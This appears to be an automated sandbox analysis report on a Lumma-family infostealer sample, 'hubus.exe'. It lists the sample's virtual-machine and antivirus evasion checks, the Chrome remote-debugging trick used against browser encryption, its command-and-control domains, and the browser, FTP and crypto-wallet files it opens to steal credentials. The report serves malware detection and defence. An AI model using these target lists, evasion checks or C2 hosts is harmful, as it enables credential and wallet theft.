                          Source: chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
                          Source: hubus.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\Desktop\hubus.exeFile read: C:\Users\user\Desktop\hubus.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: hubus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: hubus.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: hubus.exeStatic file information: File size 1361408 > 1048576
                          Source: hubus.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x14bc00
                          Source: hubus.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.cs.Net Code: Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777252)),Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777284))})
                          Source: Yara matchFile source: 0.2.hubus.exe.5c90000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 428, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A88C06 push esi; iretd 0_2_05A88C07
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AB6123 pushfd ; iretd 0_2_05AB6129
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE469F push ds; ret 0_2_05AE46B9
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE70FC push edi; ret 0_2_05AE7106
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DA00 push eax; mov dword ptr [esp], F9F8F7A6h1_2_0043DA02
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00446233 pushfd ; iretd 1_2_00446242
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004462A7 pushfd ; iretd 1_2_00446242
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043AC40 push eax; mov dword ptr [esp], E2E3E4E5h1_2_0043AC4E
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00443F28 push esp; iretd 1_2_00443F3C
                          Source: hubus.exeStatic PE information: section name: .text entropy: 7.791442134557085
                          Source: hubus.exe, KRDgtHoDHqbkhSfHPxV.csHigh entropy of concatenated method names: 'qCPsgcOkLo', 'Q3hsxG1jbi', 'r9GsDwgea9', 'v6rsRnEGMj', 'FRdsPWi4UY', 'Ns8s5c8nHW', 'kvhsZcmUSe', 'HUAUcMdSw4', 'kcds0rBWBO', 'lwosdsYqGk'
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.csHigh entropy of concatenated method names: 'ftuLFDCcKwnJFpiViv7', 'ejZc4jCaIieyMSvZlhG', 'DMF42QpxCW', 'GHaeKfCXdbZGerqe4nY', 'CfjWLjCpLtBP5fGHdIK', 'USNfZWCHKkkjEanxyq4', 'guu3WSCOJt39uWipaxC', 'zfKKbyClQIVFP23bihA', 'tETGZFCft7w1LfVrfkG', 'V5KclWCMsh4bcTTq5sv'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, tXR9HabC0UMhs4GmYlK.csHigh entropy of concatenated method names: 'TUMbXgi1I6', 'eOUbI1CbLT', 'gTEbzF6xyy', 'kQODOHqfmh', 'M46DyWCxZO', 'fbwD7h1HA8', 'iRiDLeSCxJ', 'H4LDsMAZYY', 'rfPD5UnbQY', 'Eq9DQ986Rp'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csHigh entropy of concatenated method names: 'DmTaDwBa2sELgD4F3TG', 'y9m6QPB4TistDZjQ4qA', 'wngbMVpryc', 'vh0ry9Sq2v', 'IFwbEJ9gfE', 'J9EbFmfj26', 'mLUbwxGhs1', 'cN8b1ie17g', 'fdTSZYHm6y', 'aJfxJKQGkK'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, Rm7KF5Des53FJly9wlo.csHigh entropy of concatenated method names: 'QjGnI1c8ab', 'NQQnzqvEmQ', 'nYCMOYIYKQ', 'JKZMytjdLB', 'iZoM7hJUeX', 'YKLMLqfFYX', 'QaTMsObBWO', 'wevD6XvigE', 'D3yM5tqW9I', 'wSHMQggoAG'
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 428, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\hubus.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 5020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exe TID: 7612Thread sleep time: -150000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exe TID: 4136Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.000000000152C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                          Source: chrome.exe, 00000002.00000002.12177623785.000001CD6146E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\hubus.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043C160 LdrInitializeThunk,1_2_0043C160
                          Source: C:\Users\user\Desktop\hubus.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: testyhurriedo.click
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Users\user\Desktop\hubus.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\hubus.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: hubus.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: hubus.exe, 00000001.00000002.12270439971.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: hubus.exe, 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\Desktop\hubus.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\AKJIMDEQMB
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\AZTRJHKCVR
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\GNJEVOXLLS
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\MIVTQDBATG
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\QLSSZNHVJI
                          Source: C:\Users\user\Desktop\hubus.exe, Directory queried: C:\Users\user\Documents\ZUYYDJDFVF
                          Source: Yara match, File source: 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR

                          Remote Access Functionality

                          Source: C:\Users\user\Desktop\hubus.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: Yara match, File source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR
                          Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara match, File source: hubus.exe, type: SAMPLE
                          Source: Yara match, File source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 Network Service Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Create Account | 1 Extra Window Memory Injection | 111 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 Scheduled Task/Job | 11 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 23 System Information Discovery | SMB/Windows Admin Shares | 2 Clipboard Data | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Scheduled Task/Job | 12 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 12 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1578636, Sample: hubus.dll, Startdate: 20/12/2024, Architecture: WINDOWS, Score: 100

DNS/IP: testyhurriedo.click; klipcatepiu0.shop
Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 10 other signatures

Process tree:
- hubus.exe (started)
  Signatures: Attempt to bypass Chrome Application-Bound Encryption; Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); LummaC encrypted strings found
  - hubus.exe (started)
    DNS/IP: testyhurriedo.click 104.21.112.1, 443, 49744, 49745 CLOUDFLARENETUS United States; 127.0.0.1 unknown unknown
    Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; 2 other signatures
    - chrome.exe (started)
      DNS/IP: 192.168.11.20, 137, 1900, 443 unknown unknown; 239.255.255.250, 1900 unknown Reserved
      - chrome.exe (started)
        DNS/IP: www.google.com 172.253.124.104, 443, 49749, 49750 GOOGLEUS United States

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
